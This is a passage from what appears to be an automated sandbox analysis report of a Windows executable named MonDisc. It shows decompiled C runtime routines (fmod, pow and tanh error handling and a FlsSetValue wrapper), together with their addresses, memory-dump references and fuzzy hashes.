				if (_t37 == 0) goto 0x2c9b5ce0;
				_t34 = _t33 - _t37;
				_t20 = _t34 - 0x34;
				if (_t20 >= 0) goto 0x2c9b5ce0;
				asm("pand xmm4, xmm3");
				asm("pand xmm5, xmm3");
				asm("comisd xmm4, xmm5");
				if (_t20 <= 0) goto 0x2c9b5dc0;
				if (_t34 == 0x7ff) goto 0x2c9b5d50;
				asm("movapd xmm2, xmm4");
				asm("movapd xmm3, xmm5");
				asm("divsd xmm2, xmm3");
				asm("repne dec esp");
				asm("repne dec ecx");
				asm("dec cx");
				asm("dec ecx");
				_t22 = (_t37 &  *0x2ca16ce0) - 0x3ff + _t37 - 0x3ff - 0x3ff;
				if (_t22 >= 0) goto 0x2c9b5ce0;
				asm("movapd xmm4, [0x610d4]");
				asm("movapd xmm1, xmm5");
				asm("movapd xmm6, xmm2");
				asm("movapd xmm7, xmm2");
				asm("mulsd xmm7, xmm5");
				asm("andpd xmm1, xmm4");
				asm("andpd xmm2, xmm4");
				asm("subsd xmm5, xmm1");
				asm("subsd xmm6, xmm2");
				asm("movapd xmm4, xmm1");
				asm("mulsd xmm4, xmm2");
				asm("subsd xmm4, xmm7");
				asm("mulsd xmm1, xmm6");
				asm("addsd xmm4, xmm1");
				asm("mulsd xmm2, xmm5");
				asm("addsd xmm4, xmm2");
				asm("mulsd xmm6, xmm5");
				asm("addsd xmm6, xmm4");
				asm("movapd xmm1, xmm0");
				asm("pand xmm1, [0x610b4]");
				asm("movapd xmm2, xmm1");
				asm("subsd xmm1, xmm7");
				asm("subsd xmm2, xmm1");
				asm("subsd xmm2, xmm7");
				asm("subsd xmm2, xmm6");
				asm("addsd xmm2, xmm1");
				asm("comisd xmm2, [0x61074]");
				if (_t22 >= 0) goto 0x2c9b5ca0;
				asm("addsd xmm2, xmm3");
				asm("o16 nop [eax+eax]");
				asm("comisd xmm0, [0x61058]");
				if (_t22 > 0) goto 0x2c9b5cd0;
				asm("o16 nop [eax+eax]");
				asm("movapd xmm0, xmm2");
				asm("orpd xmm0, [0x61014]");
				goto 0x2c9b5dc0;
				asm("o16 nop [eax+eax]");
				asm("movapd xmm0, xmm2");
				goto 0x2c9b5dc0;
				asm("movsd [esp+0x30], xmm0");
				asm("movsd [esp+0x40], xmm1");
				st0 = __fp0;
				st1 = __fp0;
				_t26 = _v136;
				asm("fclex");
				asm("o16 nop [eax+eax]");
				asm("fprem");
				asm("fnstsw ax");
				if ((__eax & 0x00000400) == 0x400) goto 0x2c9b5d00;
				_v136 = _t26;
				_v120 = _t26;
				asm("movsd xmm0, [esp+0x30]");
				goto 0x2c9b5dc0;
				asm("o16 nop [eax+eax]");
				asm("movsd xmm1, xmm0");
				asm("pand xmm1, [0x60f94]");
				asm("movsd xmm0, [0x60fbc]");
				asm("por xmm0, xmm1");
				goto 0x2c9b5dc0;
				asm("movapd xmm1, xmm0");
				asm("por xmm1, [0x60fb4]");
				asm("dec cx");
				r9d = 1;
				 *((intOrPtr*)(_t30 + 0x20)) = 8;
				_v144 = 0x21;
				_v120 = 2;
				_t10 = E00007FF67FF62C9D1074(__eax & 0x00000400, _t11, _t13, (__eax & 0x00000400) - 0x400, 0x2ca16cc0, _t29, _t34);
				goto 0x2c9b5dc0;
				asm("o16 nop [eax+eax]");
				asm("movapd xmm1, [0x60f88]");
				goto 0x2c9b5d5c;
				asm("o16 nop [eax+eax]");
				asm("movapd xmm0, xmm1");
				asm("o16 nop [eax+eax]");
				asm("movdqa xmm7, [esp+0x60]");
				asm("movdqa xmm6, [esp+0x50]");
				return _t10;
			}






















                              0x7ff62c9b5b07
                              0x7ff62c9b5b0d
                              0x7ff62c9b5b13
                              0x7ff62c9b5b1a
                              0x7ff62c9b5b1f
                              0x7ff62c9b5b24
                              0x7ff62c9b5b2b
                              0x7ff62c9b5b32
                              0x7ff62c9b5b39
                              0x7ff62c9b5b3f
                              0x7ff62c9b5b46
                              0x7ff62c9b5b4c
                              0x7ff62c9b5b56
                              0x7ff62c9b5b5f
                              0x7ff62c9b5b65
                              0x7ff62c9b5b6a
                              0x7ff62c9b5b6f
                              0x7ff62c9b5b73
                              0x7ff62c9b5b77
                              0x7ff62c9b5b7f
                              0x7ff62c9b5b82
                              0x7ff62c9b5b85
                              0x7ff62c9b5b89
                              0x7ff62c9b5b90
                              0x7ff62c9b5b9c
                              0x7ff62c9b5ba2
                              0x7ff62c9b5ba5
                              0x7ff62c9b5ba9
                              0x7ff62c9b5baf
                              0x7ff62c9b5bb3
                              0x7ff62c9b5bb7
                              0x7ff62c9b5bbb
                              0x7ff62c9b5bc8
                              0x7ff62c9b5bd0
                              0x7ff62c9b5bd4
                              0x7ff62c9b5bd8
                              0x7ff62c9b5bdc
                              0x7ff62c9b5be1
                              0x7ff62c9b5be6
                              0x7ff62c9b5bf2
                              0x7ff62c9b5c07
                              0x7ff62c9b5c0e
                              0x7ff62c9b5c14
                              0x7ff62c9b5c1c
                              0x7ff62c9b5c20
                              0x7ff62c9b5c24
                              0x7ff62c9b5c28
                              0x7ff62c9b5c2c
                              0x7ff62c9b5c30
                              0x7ff62c9b5c34
                              0x7ff62c9b5c38
                              0x7ff62c9b5c3c
                              0x7ff62c9b5c40
                              0x7ff62c9b5c44
                              0x7ff62c9b5c48
                              0x7ff62c9b5c4c
                              0x7ff62c9b5c50
                              0x7ff62c9b5c54
                              0x7ff62c9b5c58
                              0x7ff62c9b5c5c
                              0x7ff62c9b5c60
                              0x7ff62c9b5c64
                              0x7ff62c9b5c6c
                              0x7ff62c9b5c70
                              0x7ff62c9b5c74
                              0x7ff62c9b5c78
                              0x7ff62c9b5c7c
                              0x7ff62c9b5c80
                              0x7ff62c9b5c84
                              0x7ff62c9b5c8c
                              0x7ff62c9b5c8e
                              0x7ff62c9b5c92
                              0x7ff62c9b5ca0
                              0x7ff62c9b5ca8
                              0x7ff62c9b5caa
                              0x7ff62c9b5cb0
                              0x7ff62c9b5cb4
                              0x7ff62c9b5cbc
                              0x7ff62c9b5cc1
                              0x7ff62c9b5cd0
                              0x7ff62c9b5cd4
                              0x7ff62c9b5ce0
                              0x7ff62c9b5ce6
                              0x7ff62c9b5cec
                              0x7ff62c9b5cee
                              0x7ff62c9b5cf4
                              0x7ff62c9b5cf8
                              0x7ff62c9b5cfa
                              0x7ff62c9b5d00
                              0x7ff62c9b5d02
                              0x7ff62c9b5d0c
                              0x7ff62c9b5d0e
                              0x7ff62c9b5d12
                              0x7ff62c9b5d16
                              0x7ff62c9b5d1c
                              0x7ff62c9b5d21
                              0x7ff62c9b5d30
                              0x7ff62c9b5d34
                              0x7ff62c9b5d3c
                              0x7ff62c9b5d44
                              0x7ff62c9b5d48
                              0x7ff62c9b5d50
                              0x7ff62c9b5d54
                              0x7ff62c9b5d68
                              0x7ff62c9b5d6d
                              0x7ff62c9b5d73
                              0x7ff62c9b5d7b
                              0x7ff62c9b5d83
                              0x7ff62c9b5d8b
                              0x7ff62c9b5d90
                              0x7ff62c9b5d92
                              0x7ff62c9b5da0
                              0x7ff62c9b5da8
                              0x7ff62c9b5daa
                              0x7ff62c9b5db0
                              0x7ff62c9b5db4
                              0x7ff62c9b5dc0
                              0x7ff62c9b5dc6
                              0x7ff62c9b5dd3

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _handle_error
                              • String ID: !$fmod
                              • API String ID: 1757819995-3213614193
                              • Opcode ID: dd20ec4e41a49b05fd555289c17bf3de0b93b3d296956557c896eca9cbca0f6d
                              • Instruction ID: cebe3c65fb240d5b1c7c0a6f3995ee0f354ff43d1eeae1818df11e2eb16e0ec0
                              • Opcode Fuzzy Hash: dd20ec4e41a49b05fd555289c17bf3de0b93b3d296956557c896eca9cbca0f6d
                              • Instruction Fuzzy Hash: E3512911D2CF8185EA639B39EC157B96668FFA23D0F409733F90DB15A2DF5DA0038641
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9D0170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                              Download Yara Rule
                              C-Code - Quality: 60%
                              			E00007FF67FF62C9D0170(void* __eax, void* __ecx, void* __rdi, intOrPtr _a32, intOrPtr _a40, intOrPtr _a64, intOrPtr _a80) {
				void* _v40;
				intOrPtr _v56;
				intOrPtr _v80;
				intOrPtr _v88;
				void* _t18;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t27;
				void* _t30;

				asm("movaps [esp+0x60], xmm6");
				asm("movaps xmm6, xmm2");
				_t22 = r9d - 2;
				if (_t22 == 0) goto 0x2c9d0248;
				if (_t22 <= 0) goto 0x2c9d0287;
				if (r9d - 5 <= 0) goto 0x2c9d022f;
				_t24 = r9d - 6;
				if (_t24 == 0) goto 0x2c9d0207;
				if (_t24 <= 0) goto 0x2c9d0287;
				if (r9d - 8 <= 0) goto 0x2c9d01df;
				if (r9d != 9) goto 0x2c9d0287;
				_v56 = 2;
				_t2 = _t27 + 1; // 0x3
				r9d = _t2;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x22;
				_v88 = 0x11;
				goto 0x2c9d026b;
				_v56 = 2;
				r9d = 4;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x22;
				_v88 = 0x12;
				goto 0x2c9d026b;
				_v56 = 2;
				r9d = 1;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x21;
				_v88 = 8;
				goto 0x2c9d026b;
				asm("movsd [esp+0x50], xmm6");
				asm("movaps xmm6, [esp+0x60]");
				goto E00007FF67FF62C9D12D0;
				_a64 = 2;
				r9d = 2;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_a40 = 0x22;
				_a32 = 4;
				asm("movsd [esp+0x50], xmm6");
				_t18 = E00007FF67FF62C9D1074(2, __ecx, _t21, r9d - 9, 0x2ca1a8c8, _t30, _a80);
				asm("movaps xmm0, xmm6");
				asm("movaps xmm6, [esp+0x60]");
				return _t18;
			}













                              0x7ff62c9d0179
                              0x7ff62c9d017e
                              0x7ff62c9d0181
                              0x7ff62c9d0184
                              0x7ff62c9d018a
                              0x7ff62c9d0194
                              0x7ff62c9d019a
                              0x7ff62c9d019e
                              0x7ff62c9d01a0
                              0x7ff62c9d01aa
                              0x7ff62c9d01b0
                              0x7ff62c9d01b6
                              0x7ff62c9d01ba
                              0x7ff62c9d01ba
                              0x7ff62c9d01be
                              0x7ff62c9d01c4
                              0x7ff62c9d01ca
                              0x7ff62c9d01d2
                              0x7ff62c9d01da
                              0x7ff62c9d01df
                              0x7ff62c9d01e3
                              0x7ff62c9d01e9
                              0x7ff62c9d01ef
                              0x7ff62c9d01f5
                              0x7ff62c9d01fd
                              0x7ff62c9d0205
                              0x7ff62c9d0207
                              0x7ff62c9d020b
                              0x7ff62c9d0211
                              0x7ff62c9d0217
                              0x7ff62c9d021d
                              0x7ff62c9d0225
                              0x7ff62c9d022d
                              0x7ff62c9d022f
                              0x7ff62c9d023a
                              0x7ff62c9d0243
                              0x7ff62c9d0248
                              0x7ff62c9d024c
                              0x7ff62c9d024f
                              0x7ff62c9d0255
                              0x7ff62c9d025b
                              0x7ff62c9d0263
                              0x7ff62c9d026b
                              0x7ff62c9d0282
                              0x7ff62c9d0287
                              0x7ff62c9d028a
                              0x7ff62c9d0293

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _handle_error
                              • String ID: "$pow
                              • API String ID: 1757819995-713443511
                              • Opcode ID: d57dd57d50b79a1aca57c8340f739250ddbdc7e636d880c81068914ca528759b
                              • Instruction ID: 4dbe11ae641c39fd2fe5a3e732f728d8c174c59fe7419a7e27a5b8a1163953f5
                              • Opcode Fuzzy Hash: d57dd57d50b79a1aca57c8340f739250ddbdc7e636d880c81068914ca528759b
                              • Instruction Fuzzy Hash: 96217E72D1CAC487D770DF50E84066AAAA0FBDA3A4F202325F38A56956CFBDD1819B01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9D1C18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                              Download Yara Rule
                              C-Code - Quality: 38%
                              			E00007FF67FF62C9D1C18(void* __eax, char __ecx, void* __rcx, void* __rdx, void* __rsi, void* __r8, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v56;
				void* __rbx;
				void* _t28;
				void* _t32;
				void* _t37;
				long long _t47;
				void* _t48;
				void* _t56;
				void* _t57;

				_t55 = __rsi;
				_t54 = __rdx;
				asm("movsd [esp+0x20], xmm3");
				asm("movsd [esp+0x18], xmm2");
				_push(_t48);
				_t57 = _t56 - 0x50;
				r8d = 0;
				if ( *0x2ca1c740 == _t37) goto 0x2c9d1c53;
				r8d = r8d + 1;
				if (0x7ff62ca1c750 - 0x2ca1c910 < 0) goto 0x2c9d1c38;
				goto 0x2c9d1c5e;
				_t47 =  *((intOrPtr*)(0x2ca1c740 + 8 + (r8d + r8d) * 8));
				 *((long long*)(_t57 + 0x28)) = _t47;
				if (_t47 == 0) goto 0x2c9d1cd1;
				_v40 =  *((intOrPtr*)(_t57 + 0x70));
				_v36 = _a28;
				_v32 = _a32;
				_v28 = _a36;
				_v24 = _a40;
				_v20 = _a44;
				_v56 = __ecx;
				_t28 = E00007FF67FF62C9D0EA0(__ecx, _t47, _t48, _a48, __rdx, __rsi);
				_t53 =  &_v56;
				if (E00007FF67FF62C9BFDE0(_t28,  &_v56) != 0) goto 0x2c9d1cc9;
				E00007FF67FF62C9D1BE8( &_v56);
				asm("movsd xmm0, [esp+0x40]");
				goto 0x2c9d1ce6;
				E00007FF67FF62C9D0EA0(__ecx, _t47, _t48,  &_v56, _t54, _t55);
				_t32 = E00007FF67FF62C9D1BE8(_t53);
				asm("movsd xmm0, [esp+0x80]");
				return _t32;
			}


















                              0x7ff62c9d1c18
                              0x7ff62c9d1c18
                              0x7ff62c9d1c18
                              0x7ff62c9d1c1e
                              0x7ff62c9d1c24
                              0x7ff62c9d1c25
                              0x7ff62c9d1c35
                              0x7ff62c9d1c3a
                              0x7ff62c9d1c3c
                              0x7ff62c9d1c4d
                              0x7ff62c9d1c51
                              0x7ff62c9d1c59
                              0x7ff62c9d1c6b
                              0x7ff62c9d1c73
                              0x7ff62c9d1c79
                              0x7ff62c9d1c81
                              0x7ff62c9d1c89
                              0x7ff62c9d1c91
                              0x7ff62c9d1c9c
                              0x7ff62c9d1ca7
                              0x7ff62c9d1cab
                              0x7ff62c9d1caf
                              0x7ff62c9d1cb4
                              0x7ff62c9d1cc0
                              0x7ff62c9d1cc4
                              0x7ff62c9d1cc9
                              0x7ff62c9d1ccf
                              0x7ff62c9d1cd1
                              0x7ff62c9d1cd8
                              0x7ff62c9d1cdd
                              0x7ff62c9d1ceb

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_errno_from_matherr
                              • String ID: tanh
                              • API String ID: 1187470696-874243715
                              • Opcode ID: 4071e9fc9af7f877fa94fa12e6ee8b539db6f19dc552aa501c08e7e8212eff07
                              • Instruction ID: 22f75391b1fdad1aa6bd86d72f32734317ed1291106597d9759dc7b7b5dcd8ee
                              • Opcode Fuzzy Hash: 4071e9fc9af7f877fa94fa12e6ee8b539db6f19dc552aa501c08e7e8212eff07
                              • Instruction Fuzzy Hash: CB211036E1C6458BEB60DF28A84016A73A0FB8D360F505535F68DE2B5AEF3CD4008F01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9C6F60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 80%
                              			E00007FF67FF62C9C6F60(void* __eax, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long _a8) {
				void* _t4;
				void* _t7;
				void* _t11;
				void* _t22;

				_a8 = __rbx;
				_t4 = E00007FF67FF62C9C670C(_t7, 6, _t11, __rax, __rdx, "FlsSetValue", _t22, 0x2ca177f0, 0x2ca177f8);
				if (__rax == 0) goto 0x2c9c6fa0;
				E00007FF67FF62C9EE410(_t4, __rax);
				goto 0x2c9c6fa6;
				return TlsSetValue(??, ??);
			}







                              0x7ff62c9c6f60
                              0x7ff62c9c6f89
                              0x7ff62c9c6f96
                              0x7ff62c9c6f98
                              0x7ff62c9c6f9e
                              0x7ff62c9c6fb0

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Valuetry_get_function
                              • String ID: FlsSetValue
                              • API String ID: 738293619-3750699315
                              • Opcode ID: 502c85c5dc619a92d6527984c1c43cc070b4180259f6d5b64b151da35f8b9194
                              • Instruction ID: 568134f63afb0e8bd1922cecccb65f4aa87208775d5559210909a1e3be2aa5a5
                              • Opcode Fuzzy Hash: 502c85c5dc619a92d6527984c1c43cc070b4180259f6d5b64b151da35f8b9194
                              • Instruction Fuzzy Hash: 77E06D61E1868381EF094B54FD404B83222FF48BB0F985432D92D8A39ACE3CEA54C302
                              Uniqueness

                              Uniqueness Score: -1.00%